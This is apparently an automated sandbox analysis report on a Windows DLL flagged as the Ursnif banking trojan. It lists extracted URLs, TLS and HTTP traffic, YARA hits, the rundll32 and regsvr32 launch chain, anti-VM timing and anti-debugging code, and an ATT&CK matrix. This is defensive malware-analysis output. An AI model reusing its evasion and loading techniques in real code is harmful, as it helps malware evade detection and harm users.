Source: de-ch[1].htm.6.dr	String found in binary or memory: https://www.msn.com/de-ch/news/other/bei-den-%c3%a4rzten-schauen-die-beh%c3%b6rden-einfach-weg/ar-AA
Source: de-ch[1].htm.6.dr	String found in binary or memory: https://www.msn.com/de-ch/news/other/brand-an-der-langstrasse/ar-AAQXL4f?ocid=hplocalnews
Source: de-ch[1].htm.6.dr	String found in binary or memory: https://www.msn.com/de-ch/news/other/defektes-paket-mit-radioaktivem-inhalt-in-swiss-flieger-entdeck
Source: de-ch[1].htm.6.dr	String found in binary or memory: https://www.msn.com/de-ch/news/other/jacqueline-hofer-tritt-doch-nicht-zur-wiederwahl-an/ar-AAQTAnf?
Source: de-ch[1].htm.6.dr	String found in binary or memory: https://www.msn.com/de-ch/news/other/mehrere-tausend-menschen-demonstrieren-in-z%c3%bcrich/ar-AAQWtO
Source: de-ch[1].htm.6.dr	String found in binary or memory: https://www.msn.com/de-ch/news/other/sie-bew%c3%a4ltigen-alltagsstress-und-todesszenen/ar-AAQUall?oc
Source: de-ch[1].htm.6.dr	String found in binary or memory: https://www.msn.com/de-ch/news/other/t%c3%b6fffahrer-liefert-sich-wilde-verfolgungsjagd-mit-der-poli
Source: de-ch[1].htm.6.dr	String found in binary or memory: https://www.msn.com/de-ch/news/other/t%c3%b6fffahrer-st%c3%bcrzt-nach-verfolgungsjagd-mit-der-polize
Source: de-ch[1].htm.6.dr	String found in binary or memory: https://www.msn.com/de-ch/sport/fussball/der-fcz-zittert-und-steht-doch-ganz-oben/ar-AAQWrxt?ocid=hp
Source: de-ch[1].htm.6.dr	String found in binary or memory: https://www.msn.com/de-ch/sport/other/runter-rauf-runter-wie-gc-in-genf-vom-weg-abkommt/ar-AAQYdQe?o
Source: de-ch[1].htm.6.dr	String found in binary or memory: https://www.msn.com/de-ch/sport?ocid=StripeOCID
Source: de-ch[1].htm.6.dr	String found in binary or memory: https://www.msn.com?form=MY01O4&OCID=MY01O4
Source: 52-478955-68ddb2ab[1].js.6.dr	String found in binary or memory: https://www.onenote.com/notebooks?WT.mc_id=MSN_OneNote_QuickNote&auth=1
Source: 52-478955-68ddb2ab[1].js.6.dr	String found in binary or memory: https://www.onenote.com/notebooks?WT.mc_id=MSN_OneNote_Recent&auth=1&wdorigin=msn
Source: de-ch[1].htm.6.dr	String found in binary or memory: https://www.onenote.com/notebooks?WT.mc_id=MSN_OneNote_TopMenu&auth=1&wdorigin=msn
Source: iab2Data[1].json.6.dr	String found in binary or memory: https://www.onlineumfragen.com/3index_2010_agb.cfm
Source: iab2Data[1].json.6.dr	String found in binary or memory: https://www.queryclick.com/privacy-policy
Source: de-ch[1].htm.6.dr	String found in binary or memory: https://www.ricardo.ch/?utm_source=msn&utm_medium=affiliate&utm_campaign=msn_mestripe_logo_d
Source: de-ch[1].htm.6.dr	String found in binary or memory: https://www.ricardo.ch/?utm_source=msn&utm_medium=affiliate&utm_campaign=msn_shop_de&utm
Source: de-ch[1].htm.6.dr	String found in binary or memory: https://www.skype.com/
Source: 52-478955-68ddb2ab[1].js.6.dr	String found in binary or memory: https://www.skype.com/de
Source: 52-478955-68ddb2ab[1].js.6.dr	String found in binary or memory: https://www.skype.com/de/download-skype
Source: 52-478955-68ddb2ab[1].js.6.dr	String found in binary or memory: https://www.skype.com/go/onedrivepromo.download?cm_mmc=MSFT_2390_MSN-com
Source: de-ch[1].htm.6.dr	String found in binary or memory: https://www.skyscanner.net/flights?associateid=API_B2B_19305_00001&vertical=custom&pageType=
Source: de-ch[1].htm.6.dr	String found in binary or memory: https://www.skyscanner.net/g/referrals/v1/cars/home?associateid=API_B2B_19305_00002
Source: iab2Data[1].json.6.dr	String found in binary or memory: https://www.stroeer.com/fileadmin/com/StroeerDSP_deviceStorage.json
Source: iab2Data[1].json.6.dr	String found in binary or memory: https://www.stroeer.de/ssp-datenschutz
Source: iab2Data[1].json.6.dr	String found in binary or memory: https://www.stroeer.de/werben-mit-stroeer/onlinewerbung/programmatic-data/sdi-datenschutz-b2c
Source: 52-478955-68ddb2ab[1].js.6.dr	String found in binary or memory: https://www.sway.com/?WT.mc_id=MSN_site&utm_source=MSN&utm_medium=Topnav&utm_campaign=link;PowerPoin
Source: de-ch[1].htm.6.dr	String found in binary or memory: https://www.tippsundtricks.co/gesundheit/finger-persoenlichkeit/?utm_campaign=DECH-Finger&utm_so
Source: de-ch[1].htm.6.dr	String found in binary or memory: https://www.tippsundtricks.co/gesundheit/knoblauchzehe-unters-kopfkissen/?utm_campaign=DECH-Knoblauc
Source: de-ch[1].htm.6.dr	String found in binary or memory: https://www.tippsundtricks.co/lifehacks/schwamm-kuhlschrank/?utm_campaign=DECH-schwamm&utm_sourc

Source: unknown

DNS traffic detected: queries for: www.msn.com

Source: global traffic	HTTP traffic detected: GET /tag?o=6208086025961472&upapi=true HTTP/1.1Accept: application/javascript, /;q=0.8Referer: https://www.msn.com/de-ch/?ocid=iehpAccept-Language: en-USUser-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; Trident/7.0; rv:11.0) like GeckoAccept-Encoding: gzip, deflateHost: btloader.comConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET /favicon.ico?ad=300x250&ad_box_=1&adnet=1&showad=1&size=250x250 HTTP/1.1Accept: image/png, image/svg+xml, image/jxr, image/;q=0.8, /*;q=0.5Referer: https://www.msn.com/de-ch/?ocid=iehpAccept-Language: en-USUser-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; Trident/7.0; rv:11.0) like GeckoAccept-Encoding: gzip, deflateHost: ad.doubleclick.netConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET /px.gif?ch=1&e=0.4482105559414631 HTTP/1.1Accept: image/png, image/svg+xml, image/jxr, image/;q=0.8, /*;q=0.5Referer: https://www.msn.com/de-ch/?ocid=iehpAccept-Language: en-USUser-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; Trident/7.0; rv:11.0) like GeckoAccept-Encoding: gzip, deflateHost: ad-delivery.netConnection: Keep-Alive

Source: unknown	HTTPS traffic detected: 172.67.70.134:443 -> 192.168.2.5:49757 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 172.67.70.134:443 -> 192.168.2.5:49756 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 142.250.203.102:443 -> 192.168.2.5:49760 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 142.250.203.102:443 -> 192.168.2.5:49759 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 104.26.3.70:443 -> 192.168.2.5:49761 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 104.26.3.70:443 -> 192.168.2.5:49762 version: TLS 1.2

Key, Mouse, Clipboard, Microphone and Screen Capturing:

Yara detected Ursnif

Show sources

Source: Yara match	File source: 5.2.rundll32.exe.2ed0000.1.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 2.2.regsvr32.exe.4620000.1.unpack, type: UNPACKEDPE
Source: Yara match	File source: 5.2.rundll32.exe.2eb0000.0.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 2.2.regsvr32.exe.4620000.1.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 2.2.regsvr32.exe.4600000.0.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 5.2.rundll32.exe.2ed0000.1.unpack, type: UNPACKEDPE
Source: Yara match	File source: 00000002.00000002.911757798.0000000004620000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 00000002.00000002.911635582.0000000004600000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 00000005.00000002.911557435.0000000002ED0000.00000040.00000010.sdmp, type: MEMORY
Source: Yara match	File source: 00000005.00000002.911406171.0000000002EB0000.00000004.00000010.sdmp, type: MEMORY

Source: loaddll32.exe, 00000000.00000002.892680935.000000000164B000.00000004.00000020.sdmp

Binary or memory string: <HOOK MODULE="DDRAW.DLL" FUNCTION="DirectDrawCreateEx"/>

E-Banking Fraud:

Yara detected Ursnif

Show sources

Source: Yara match	File source: 5.2.rundll32.exe.2ed0000.1.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 2.2.regsvr32.exe.4620000.1.unpack, type: UNPACKEDPE
Source: Yara match	File source: 5.2.rundll32.exe.2eb0000.0.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 2.2.regsvr32.exe.4620000.1.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 2.2.regsvr32.exe.4600000.0.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 5.2.rundll32.exe.2ed0000.1.unpack, type: UNPACKEDPE
Source: Yara match	File source: 00000002.00000002.911757798.0000000004620000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 00000002.00000002.911635582.0000000004600000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 00000005.00000002.911557435.0000000002ED0000.00000040.00000010.sdmp, type: MEMORY
Source: Yara match	File source: 00000005.00000002.911406171.0000000002EB0000.00000004.00000010.sdmp, type: MEMORY

Source: 2zTgaLRFkL.dll

Static PE information: 32BIT_MACHINE, EXECUTABLE_IMAGE, DLL

Source: C:\Windows\SysWOW64\regsvr32.exe

Section loaded: sfc.dll

Jump to behavior

Source: C:\Windows\System32\loaddll32.exe	Code function: 0_2_7321BF43	0_2_7321BF43
Source: C:\Windows\System32\loaddll32.exe	Code function: 0_2_73211000	0_2_73211000
Source: C:\Windows\SysWOW64\regsvr32.exe	Code function: 2_2_7321BF43	2_2_7321BF43
Source: C:\Windows\SysWOW64\regsvr32.exe	Code function: 2_2_73211000	2_2_73211000

Source: 2zTgaLRFkL.dll

Static PE information: Section: .text IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_READ

Source: C:\Windows\System32\loaddll32.exe

Key opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers

Jump to behavior

Source: C:\Windows\SysWOW64\cmd.exe

Process created: C:\Windows\SysWOW64\rundll32.exe rundll32.exe "C:\Users\user\Desktop\2zTgaLRFkL.dll",#1

Source: unknown	Process created: C:\Windows\System32\loaddll32.exe loaddll32.exe "C:\Users\user\Desktop\2zTgaLRFkL.dll"
Source: C:\Windows\System32\loaddll32.exe	Process created: C:\Windows\SysWOW64\cmd.exe cmd.exe /C rundll32.exe "C:\Users\user\Desktop\2zTgaLRFkL.dll",#1
Source: C:\Windows\System32\loaddll32.exe	Process created: C:\Windows\SysWOW64\regsvr32.exe regsvr32.exe /s C:\Users\user\Desktop\2zTgaLRFkL.dll
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\SysWOW64\rundll32.exe rundll32.exe "C:\Users\user\Desktop\2zTgaLRFkL.dll",#1
Source: C:\Windows\System32\loaddll32.exe	Process created: C:\Program Files\internet explorer\iexplore.exe C:\Program Files\Internet Explorer\iexplore.exe
Source: C:\Windows\System32\loaddll32.exe	Process created: C:\Windows\SysWOW64\rundll32.exe rundll32.exe C:\Users\user\Desktop\2zTgaLRFkL.dll,DllRegisterServer
Source: C:\Program Files\internet explorer\iexplore.exe	Process created: C:\Program Files (x86)\Internet Explorer\iexplore.exe "C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE" SCODEF:764 CREDAT:17410 /prefetch:2
Source: C:\Windows\System32\loaddll32.exe	Process created: C:\Windows\SysWOW64\rundll32.exe rundll32.exe C:\Users\user\Desktop\2zTgaLRFkL.dll,abetfoehywujav
Source: C:\Windows\System32\loaddll32.exe	Process created: C:\Windows\SysWOW64\rundll32.exe rundll32.exe C:\Users\user\Desktop\2zTgaLRFkL.dll,abjqkqaxstop
Source: C:\Windows\System32\loaddll32.exe	Process created: C:\Windows\SysWOW64\cmd.exe cmd.exe /C rundll32.exe "C:\Users\user\Desktop\2zTgaLRFkL.dll",#1	Jump to behavior
Source: C:\Windows\System32\loaddll32.exe	Process created: C:\Windows\SysWOW64\regsvr32.exe regsvr32.exe /s C:\Users\user\Desktop\2zTgaLRFkL.dll	Jump to behavior
Source: C:\Windows\System32\loaddll32.exe	Process created: C:\Program Files\internet explorer\iexplore.exe C:\Program Files\Internet Explorer\iexplore.exe	Jump to behavior
Source: C:\Windows\System32\loaddll32.exe	Process created: C:\Windows\SysWOW64\rundll32.exe rundll32.exe C:\Users\user\Desktop\2zTgaLRFkL.dll,DllRegisterServer	Jump to behavior
Source: C:\Windows\System32\loaddll32.exe	Process created: C:\Windows\SysWOW64\rundll32.exe rundll32.exe C:\Users\user\Desktop\2zTgaLRFkL.dll,abetfoehywujav	Jump to behavior
Source: C:\Windows\System32\loaddll32.exe	Process created: C:\Windows\SysWOW64\rundll32.exe rundll32.exe C:\Users\user\Desktop\2zTgaLRFkL.dll,abjqkqaxstop	Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\SysWOW64\rundll32.exe rundll32.exe "C:\Users\user\Desktop\2zTgaLRFkL.dll",#1	Jump to behavior
Source: C:\Program Files\internet explorer\iexplore.exe	Process created: C:\Program Files (x86)\Internet Explorer\iexplore.exe "C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE" SCODEF:764 CREDAT:17410 /prefetch:2	Jump to behavior

Source: C:\Program Files\internet explorer\iexplore.exe

File created: C:\Users\user\AppData\Local\Microsoft\Internet Explorer\Recovery\High\Active\RecoveryStore.{8D788003-4BE3-11EC-90E5-ECF4BB570DC9}.dat

Jump to behavior

Source: C:\Program Files\internet explorer\iexplore.exe

File created: C:\Users\user\AppData\Local\Temp\~DFA1E2BE88D585CFB5.TMP

Jump to behavior

Source: classification engine

Classification label: mal64.troj.evad.winDLL@17/115@11/3

Source: C:\Program Files\internet explorer\iexplore.exe

File read: C:\Users\desktop.ini

Jump to behavior

Source: C:\Program Files (x86)\Internet Explorer\iexplore.exe

File opened: C:\Program Files (x86)\Java\jre1.8.0_211\bin\msvcr100.dll

Jump to behavior

Source: 2zTgaLRFkL.dll	Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_IMPORT
Source: 2zTgaLRFkL.dll	Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_RESOURCE
Source: 2zTgaLRFkL.dll	Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_BASERELOC
Source: 2zTgaLRFkL.dll	Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_DEBUG
Source: 2zTgaLRFkL.dll	Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG
Source: 2zTgaLRFkL.dll	Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_IAT

Source: 2zTgaLRFkL.dll

Static PE information: DYNAMIC_BASE, NX_COMPAT

Source: 2zTgaLRFkL.dll

Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_DEBUG

Source: 2zTgaLRFkL.dll	Static PE information: Data directory: IMAGE_DIRECTORY_ENTRY_IMPORT is in: .rdata
Source: 2zTgaLRFkL.dll	Static PE information: Data directory: IMAGE_DIRECTORY_ENTRY_RESOURCE is in: .rsrc
Source: 2zTgaLRFkL.dll	Static PE information: Data directory: IMAGE_DIRECTORY_ENTRY_BASERELOC is in: .reloc
Source: 2zTgaLRFkL.dll	Static PE information: Data directory: IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG is in: .rdata
Source: 2zTgaLRFkL.dll	Static PE information: Data directory: IMAGE_DIRECTORY_ENTRY_IAT is in: .rdata

Source: C:\Windows\System32\loaddll32.exe	Code function: 0_2_73213230 push ecx; ret		0_2_73213243
Source: C:\Windows\SysWOW64\regsvr32.exe	Code function: 2_2_73213230 push ecx; ret		2_2_73213243

Source: C:\Windows\System32\loaddll32.exe

Process created: C:\Windows\SysWOW64\regsvr32.exe regsvr32.exe /s C:\Users\user\Desktop\2zTgaLRFkL.dll

Hooking and other Techniques for Hiding and Protection:

Yara detected Ursnif

Show sources

Source: Yara match	File source: 5.2.rundll32.exe.2ed0000.1.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 2.2.regsvr32.exe.4620000.1.unpack, type: UNPACKEDPE
Source: Yara match	File source: 5.2.rundll32.exe.2eb0000.0.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 2.2.regsvr32.exe.4620000.1.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 2.2.regsvr32.exe.4600000.0.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 5.2.rundll32.exe.2ed0000.1.unpack, type: UNPACKEDPE
Source: Yara match	File source: 00000002.00000002.911757798.0000000004620000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 00000002.00000002.911635582.0000000004600000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 00000005.00000002.911557435.0000000002ED0000.00000040.00000010.sdmp, type: MEMORY
Source: Yara match	File source: 00000005.00000002.911406171.0000000002EB0000.00000004.00000010.sdmp, type: MEMORY

Source: C:\Windows\SysWOW64\cmd.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior

Malware Analysis System Evasion:

Tries to detect virtualization through RDTSC time measurements

Show sources

Source: C:\Windows\SysWOW64\regsvr32.exe	RDTSC instruction interceptor: First address: 00000000732117AD second address: 00000000732117B4 instructions: 0x00000000 rdtscp 0x00000003 mov dword ptr [esp+68h], ecx 0x00000007 rdtscp
Source: C:\Windows\SysWOW64\regsvr32.exe	RDTSC instruction interceptor: First address: 00000000732117B4 second address: 00000000732117C1 instructions: 0x00000000 rdtscp 0x00000003 mov dword ptr [esp+68h], ecx 0x00000007 nop dword ptr [eax+eax+00h] 0x0000000c inc esi 0x0000000d rdtscp
Source: C:\Windows\SysWOW64\regsvr32.exe	RDTSC instruction interceptor: First address: 00000000732117C1 second address: 00000000732117C1 instructions: 0x00000000 rdtscp 0x00000003 mov dword ptr [esp+68h], ecx 0x00000007 movd xmm0, esi 0x0000000b cvtdq2pd xmm0, xmm0 0x0000000f comisd xmm2, xmm0 0x00000013 jnc 00007FB72CADC1ECh 0x00000015 inc esi 0x00000016 rdtscp
Source: C:\Windows\SysWOW64\rundll32.exe	RDTSC instruction interceptor: First address: 00000000732117AD second address: 00000000732117B4 instructions: 0x00000000 rdtscp 0x00000003 mov dword ptr [esp+68h], ecx 0x00000007 rdtscp
Source: C:\Windows\SysWOW64\rundll32.exe	RDTSC instruction interceptor: First address: 00000000732117B4 second address: 00000000732117C1 instructions: 0x00000000 rdtscp 0x00000003 mov dword ptr [esp+68h], ecx 0x00000007 nop dword ptr [eax+eax+00h] 0x0000000c inc esi 0x0000000d rdtscp
Source: C:\Windows\SysWOW64\rundll32.exe	RDTSC instruction interceptor: First address: 00000000732117C1 second address: 00000000732117C1 instructions: 0x00000000 rdtscp 0x00000003 mov dword ptr [esp+68h], ecx 0x00000007 movd xmm0, esi 0x0000000b cvtdq2pd xmm0, xmm0 0x0000000f comisd xmm2, xmm0 0x00000013 jnc 00007FB72CB4E63Ch 0x00000015 inc esi 0x00000016 rdtscp
Source: C:\Windows\SysWOW64\rundll32.exe	RDTSC instruction interceptor: First address: 00000000732117C1 second address: 00000000732117C1 instructions: 0x00000000 rdtscp 0x00000003 mov dword ptr [esp+68h], ecx 0x00000007 movd xmm0, esi 0x0000000b cvtdq2pd xmm0, xmm0 0x0000000f comisd xmm2, xmm0 0x00000013 jnc 00007FB72CADC1ECh 0x00000015 inc esi 0x00000016 rdtscp
Source: C:\Windows\System32\loaddll32.exe	RDTSC instruction interceptor: First address: 00000000732117AD second address: 00000000732117B4 instructions: 0x00000000 rdtscp 0x00000003 mov dword ptr [esp+68h], ecx 0x00000007 rdtscp
Source: C:\Windows\System32\loaddll32.exe	RDTSC instruction interceptor: First address: 00000000732117B4 second address: 00000000732117C1 instructions: 0x00000000 rdtscp 0x00000003 mov dword ptr [esp+68h], ecx 0x00000007 nop dword ptr [eax+eax+00h] 0x0000000c inc esi 0x0000000d rdtscp
Source: C:\Windows\System32\loaddll32.exe	RDTSC instruction interceptor: First address: 00000000732117C1 second address: 00000000732117C1 instructions: 0x00000000 rdtscp 0x00000003 mov dword ptr [esp+68h], ecx 0x00000007 movd xmm0, esi 0x0000000b cvtdq2pd xmm0, xmm0 0x0000000f comisd xmm2, xmm0 0x00000013 jnc 00007FB72CB4E63Ch 0x00000015 inc esi 0x00000016 rdtscp

Source: C:\Windows\System32\loaddll32.exe

Code function: 0_2_73211770 rdtscp

0_2_73211770

Source: C:\Windows\System32\loaddll32.exe	Code function: 0_2_73215FE6 FindFirstFileExW,		0_2_73215FE6
Source: C:\Windows\SysWOW64\regsvr32.exe	Code function: 2_2_73215FE6 FindFirstFileExW,		2_2_73215FE6

Anti Debugging:

Potentially malicious time measurement code found

Show sources

Source: C:\Windows\System32\loaddll32.exe	Code function: 0_2_73211770 Start: 73211831 End: 732117B4		0_2_73211770
Source: C:\Windows\SysWOW64\regsvr32.exe	Code function: 2_2_73211770 Start: 73211831 End: 732117B4		2_2_73211770

Source: C:\Windows\System32\loaddll32.exe

Code function: 0_2_73215928 IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,

0_2_73215928

Source: C:\Windows\System32\loaddll32.exe	Code function: 0_2_7321473B mov eax, dword ptr fs:[00000030h]	0_2_7321473B
Source: C:\Windows\System32\loaddll32.exe	Code function: 0_2_73211FB0 mov eax, dword ptr fs:[00000030h]	0_2_73211FB0
Source: C:\Windows\System32\loaddll32.exe	Code function: 0_2_73212440 mov eax, dword ptr fs:[00000030h]	0_2_73212440
Source: C:\Windows\System32\loaddll32.exe	Code function: 0_2_73212440 mov eax, dword ptr fs:[00000030h]	0_2_73212440
Source: C:\Windows\System32\loaddll32.exe	Code function: 0_2_732158F5 mov eax, dword ptr fs:[00000030h]	0_2_732158F5
Source: C:\Windows\SysWOW64\regsvr32.exe	Code function: 2_2_7321473B mov eax, dword ptr fs:[00000030h]	2_2_7321473B
Source: C:\Windows\SysWOW64\regsvr32.exe	Code function: 2_2_73211FB0 mov eax, dword ptr fs:[00000030h]	2_2_73211FB0
Source: C:\Windows\SysWOW64\regsvr32.exe	Code function: 2_2_73212440 mov eax, dword ptr fs:[00000030h]	2_2_73212440
Source: C:\Windows\SysWOW64\regsvr32.exe	Code function: 2_2_73212440 mov eax, dword ptr fs:[00000030h]	2_2_73212440
Source: C:\Windows\SysWOW64\regsvr32.exe	Code function: 2_2_732158F5 mov eax, dword ptr fs:[00000030h]	2_2_732158F5

Source: C:\Windows\System32\loaddll32.exe

Code function: 0_2_732176FC GetProcessHeap,

0_2_732176FC

Source: C:\Windows\System32\loaddll32.exe

Code function: 0_2_73211770 rdtscp

0_2_73211770

Source: C:\Windows\System32\loaddll32.exe	Code function: 0_2_73212B84 SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,	0_2_73212B84
Source: C:\Windows\System32\loaddll32.exe	Code function: 0_2_73215928 IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,	0_2_73215928
Source: C:\Windows\System32\loaddll32.exe	Code function: 0_2_7321305D IsProcessorFeaturePresent,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,	0_2_7321305D
Source: C:\Windows\SysWOW64\regsvr32.exe	Code function: 2_2_73212B84 SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,	2_2_73212B84
Source: C:\Windows\SysWOW64\regsvr32.exe	Code function: 2_2_73215928 IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,	2_2_73215928
Source: C:\Windows\SysWOW64\regsvr32.exe	Code function: 2_2_7321305D IsProcessorFeaturePresent,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,	2_2_7321305D

Source: C:\Windows\SysWOW64\cmd.exe

Process created: C:\Windows\SysWOW64\rundll32.exe rundll32.exe "C:\Users\user\Desktop\2zTgaLRFkL.dll",#1

Jump to behavior

Source: regsvr32.exe, 00000002.00000002.910886049.00000000031F0000.00000002.00020000.sdmp, rundll32.exe, 00000003.00000002.910165140.0000000003080000.00000002.00020000.sdmp, rundll32.exe, 00000005.00000002.912491958.0000000003580000.00000002.00020000.sdmp	Binary or memory string: Shell_TrayWnd
Source: regsvr32.exe, 00000002.00000002.910886049.00000000031F0000.00000002.00020000.sdmp, rundll32.exe, 00000003.00000002.910165140.0000000003080000.00000002.00020000.sdmp, rundll32.exe, 00000005.00000002.912491958.0000000003580000.00000002.00020000.sdmp	Binary or memory string: Progman
Source: regsvr32.exe, 00000002.00000002.910886049.00000000031F0000.00000002.00020000.sdmp, rundll32.exe, 00000003.00000002.910165140.0000000003080000.00000002.00020000.sdmp, rundll32.exe, 00000005.00000002.912491958.0000000003580000.00000002.00020000.sdmp	Binary or memory string: SProgram Managerl
Source: regsvr32.exe, 00000002.00000002.910886049.00000000031F0000.00000002.00020000.sdmp, rundll32.exe, 00000003.00000002.910165140.0000000003080000.00000002.00020000.sdmp, rundll32.exe, 00000005.00000002.912491958.0000000003580000.00000002.00020000.sdmp	Binary or memory string: Shell_TrayWnd,
Source: regsvr32.exe, 00000002.00000002.910886049.00000000031F0000.00000002.00020000.sdmp, rundll32.exe, 00000003.00000002.910165140.0000000003080000.00000002.00020000.sdmp, rundll32.exe, 00000005.00000002.912491958.0000000003580000.00000002.00020000.sdmp	Binary or memory string: Progmanlock

Source: C:\Windows\System32\loaddll32.exe

Code function: 0_2_73213247 cpuid

0_2_73213247

Source: C:\Windows\System32\loaddll32.exe

Code function: 0_2_73212CA6 GetSystemTimeAsFileTime,GetCurrentThreadId,GetCurrentProcessId,QueryPerformanceCounter,

0_2_73212CA6

Stealing of Sensitive Information:

Yara detected Ursnif

Show sources

Source: Yara match	File source: 5.2.rundll32.exe.2ed0000.1.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 2.2.regsvr32.exe.4620000.1.unpack, type: UNPACKEDPE
Source: Yara match	File source: 5.2.rundll32.exe.2eb0000.0.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 2.2.regsvr32.exe.4620000.1.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 2.2.regsvr32.exe.4600000.0.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 5.2.rundll32.exe.2ed0000.1.unpack, type: UNPACKEDPE
Source: Yara match	File source: 00000002.00000002.911757798.0000000004620000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 00000002.00000002.911635582.0000000004600000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 00000005.00000002.911557435.0000000002ED0000.00000040.00000010.sdmp, type: MEMORY
Source: Yara match	File source: 00000005.00000002.911406171.0000000002EB0000.00000004.00000010.sdmp, type: MEMORY

Remote Access Functionality:

Yara detected Ursnif

Show sources

Source: Yara match	File source: 5.2.rundll32.exe.2ed0000.1.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 2.2.regsvr32.exe.4620000.1.unpack, type: UNPACKEDPE
Source: Yara match	File source: 5.2.rundll32.exe.2eb0000.0.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 2.2.regsvr32.exe.4620000.1.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 2.2.regsvr32.exe.4600000.0.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 5.2.rundll32.exe.2ed0000.1.unpack, type: UNPACKEDPE
Source: Yara match	File source: 00000002.00000002.911757798.0000000004620000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 00000002.00000002.911635582.0000000004600000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 00000005.00000002.911557435.0000000002ED0000.00000040.00000010.sdmp, type: MEMORY
Source: Yara match	File source: 00000005.00000002.911406171.0000000002EB0000.00000004.00000010.sdmp, type: MEMORY

Mitre Att&ck Matrix

Initial Access	Execution	Persistence	Privilege Escalation	Defense Evasion	Credential Access	Discovery	Lateral Movement	Collection	Exfiltration	Command and Control	Network Effects	Remote Service Effects	Impact
Valid Accounts	Windows Management Instrumentation	DLL Side-Loading1	Process Injection12	Masquerading1	Input Capture1	System Time Discovery1	Remote Services	Input Capture1	Exfiltration Over Other Network Medium	Encrypted Channel11	Eavesdrop on Insecure Network Communication	Remotely Track Device Without Authorization	Modify System Partition
Default Accounts	Scheduled Task/Job	Boot or Logon Initialization Scripts	DLL Side-Loading1	Process Injection12	LSASS Memory	Security Software Discovery13	Remote Desktop Protocol	Archive Collected Data1	Exfiltration Over Bluetooth	Ingress Tool Transfer1	Exploit SS7 to Redirect Phone Calls/SMS	Remotely Wipe Data Without Authorization	Device Lockout
Domain Accounts	At (Linux)	Logon Script (Windows)	Logon Script (Windows)	Obfuscated Files or Information1	Security Account Manager	Process Discovery1	SMB/Windows Admin Shares	Data from Network Shared Drive	Automated Exfiltration	Non-Application Layer Protocol2	Exploit SS7 to Track Device Location	Obtain Device Cloud Backups	Delete Device Data
Local Accounts	At (Windows)	Logon Script (Mac)	Logon Script (Mac)	Regsvr321	NTDS	File and Directory Discovery2	Distributed Component Object Model	Input Capture	Scheduled Transfer	Application Layer Protocol3	SIM Card Swap		Carrier Billing Fraud
Cloud Accounts	Cron	Network Logon Script	Network Logon Script	Rundll321	LSA Secrets	System Information Discovery112	SSH	Keylogging	Data Transfer Size Limits	Fallback Channels	Manipulate Device Communication		Manipulate App Store Rankings or Ratings
